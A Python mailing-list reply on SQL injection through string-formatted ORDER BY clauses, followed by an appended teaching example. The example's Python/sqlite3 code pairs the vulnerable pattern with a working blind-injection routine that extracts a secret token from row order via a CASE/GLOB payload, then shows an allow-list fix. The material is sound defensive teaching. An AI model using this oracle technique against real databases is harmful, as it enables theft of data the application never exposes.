Leif K-Brooks wrote:

> John Bokma wrote:
>> my $sort = $cgi->param( "sort" );
>> my $query = "SELECT * FROM table WHERE id=? ORDER BY $sort";
>
> And the equivalent Python code:
>
> cursor.execute('SELECT * FROM table WHERE id=%%s ORDER BY %s' % sort,
>                [some_id])
>
> You're right, of course, about being *able* to write code with SQL
> injection vulnerabilities in Python.
I can only speak for Perl for now, but I am sure it has been done, and I
don't want to know how often :-D (Unless everyone who did pays me 1 USD.)

> But it's not even close to being as
> easy as in PHP.

I didn't deny that :-)

Personally I don't like PHP's "magicaddslashquote" stuff. It gives
beginners the impression that everything is taken care of. It's like
giving someone a house with a door with 7 locks, without telling them that
all the windows at ground level can't be closed (and the master key is
under the doormat).

--
John

MexIT: http://johnbokma.com/mexit/
personal page: http://johnbokma.com/
Experienced programmer available: http://castleamber.com/
Happy Customers: http://castleamber.com/testimonials.html
--
http://mail.python.org/mailman/listinfo/python-list
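The thread's point is that binding the value (`id=?`) does nothing for the identifier spliced into `ORDER BY`, and that this is not harmless even when only one statement can run: an attacker who controls the sort expression can turn row order into a boolean oracle. The following is an added example, not code from the thread or from any poster; it uses Python's `sqlite3` (so `?` placeholders instead of MySQLdb's `%s`), a constructed `items`/`secrets` schema, and a hypothetical allow-list of sortable columns. It shows the quoted pattern, an attack that reads `secrets.token` one character at a time purely from the order of the returned rows, and the allow-list version that rejects anything that is not a known column plus an optional direction.

```python
import sqlite3
import string

# Constructed sample schema and rows (assumption, not from the thread).
SCHEMA = """
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
INSERT INTO items VALUES (1, 'pear', 3), (2, 'apple', 1), (3, 'fig', 2);
CREATE TABLE secrets (token TEXT);
INSERT INTO secrets VALUES ('s3cr3t');
"""

# Hypothetical allow-list: user-supplied name -> real column name.
ALLOWED_SORT_COLUMNS = {"id": "id", "name": "name", "price": "price"}


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_vulnerable(conn, min_price, sort):
    """The pattern from the thread: the value is bound, the ORDER BY
    expression is string-formatted straight from user input."""
    sql = "SELECT id, name FROM items WHERE price >= ? ORDER BY %s" % sort
    return conn.execute(sql, (min_price,)).fetchall()


def leak_token(conn, max_len=16):
    """Recover secrets.token through fetch_vulnerable without ever seeing
    the secret in the output: the CASE expression sorts ascending by id
    when the guessed prefix is right and descending otherwise, so the
    row order answers one yes/no question per request."""
    alphabet = string.ascii_letters + string.digits
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            guess = known + ch
            # GLOB is case-sensitive in SQLite; LIKE would not be.
            payload = ("(CASE WHEN (SELECT token FROM secrets) GLOB '%s*' "
                       "THEN id ELSE -id END)" % guess)
            ids = [row[0] for row in fetch_vulnerable(conn, 0, payload)]
            if ids == sorted(ids):
                known = guess
                break
        else:
            # No character extended the prefix: the token is complete.
            return known
    return known


def safe_order_clause(sort):
    """Map user input to an ORDER BY clause built only from allow-listed
    column names and directions; anything else is rejected, never quoted."""
    parts = sort.split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("bad sort parameter: %r" % sort)
    column = ALLOWED_SORT_COLUMNS.get(parts[0].lower())
    if column is None:
        raise ValueError("unknown sort column: %r" % parts[0])
    direction = "ASC"
    if len(parts) == 2:
        direction = parts[1].upper()
        if direction not in ("ASC", "DESC"):
            raise ValueError("bad sort direction: %r" % parts[1])
    return "%s %s" % (column, direction)


def fetch_safe(conn, min_price, sort):
    """Same query; the identifier comes from safe_order_clause, the value
    is still a bound parameter."""
    sql = ("SELECT id, name FROM items WHERE price >= ? ORDER BY "
           + safe_order_clause(sort))
    return conn.execute(sql, (min_price,)).fetchall()


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable, sort=price:", fetch_vulnerable(db, 0, "price"))
    print("leaked via row order:", leak_token(db))
    print("safe, sort='price desc':", fetch_safe(db, 0, "price desc"))
    try:
        fetch_safe(db, 0, "(SELECT token FROM secrets)")
    except ValueError as exc:
        print("rejected:", exc)
```

The allow-list is deliberately a mapping rather than a quoting routine: escaping an identifier (backticks, double quotes) stops the syntax from being broken out of, but it still lets the caller name any column, including ones the application never meant to expose, whereas the mapping pins the set of reachable expressions to exactly what the code author wrote down.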